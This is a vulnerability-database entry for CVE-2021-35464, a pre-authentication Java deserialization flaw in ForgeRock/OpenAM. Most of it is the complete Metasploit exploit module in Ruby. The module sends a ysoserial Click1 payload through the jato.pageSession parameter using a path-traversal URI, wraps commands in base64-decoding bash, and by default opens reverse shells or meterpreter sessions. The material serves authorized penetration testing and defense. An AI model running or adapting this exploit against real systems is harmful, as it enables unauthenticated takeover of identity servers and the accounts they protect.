Lucene search

Michael Stepankin, bwatters-r7, Spencer McIntyre, jheysel-r7MSF:EXPLOIT-MULTI-HTTP-CVE_2021_35464_FORGEROCK_OPENAM-

HistoryJul 02, 2021 - 9:05 p.m.

ForgeRock / OpenAM Jato Java Deserialization

2021-07-0221:05:39

Michael Stepankin, bwatters-r7, Spencer McIntyre, jheysel-r7

www.rapid7.com

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.974 High

EPSS

Percentile

99.9%

JSON

This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user. This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus is susceptible to the same issue.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ForgeRock / OpenAM Jato Java Deserialization',
        'Description' => %q{
          This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and
          access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s
          implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a
          vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user.

          This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus
          is susceptible to the same issue.
        },
        'Author' => [
          'Michael Stepankin',  # Original Discovery and PoC
          'bwatters-r7',        # Msf module
          'Spencer McIntyre',   # All of the Help
          'jheysel-r7'          # Check Method
        ],
        'References' => [
          ['CVE', '2021-35464'],
          ['URL', 'https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464'],
          ['URL', 'https://backstage.forgerock.com/knowledge/kb/article/a47894244']
        ],
        'DisclosureDate' => '2021-06-29',
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 1,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/openam'])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),
      'vars_post' => {
        'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
      }
    )
    if res.nil?
      CheckCode::Unknown("The target server didn't respond!")
    elsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end

  def execute_command(cmd, _opts = {})
    cmd_encapsulated = "bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash"
    ysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),
      'vars_post' => {
        'jato.pageSession' => Base64.urlsafe_encode64("\x00" + ysoserial_payload)
      }
    )
    unless res && res.code == 302
      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
    end
    print_good("Successfully executed command: #{cmd}")
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end
end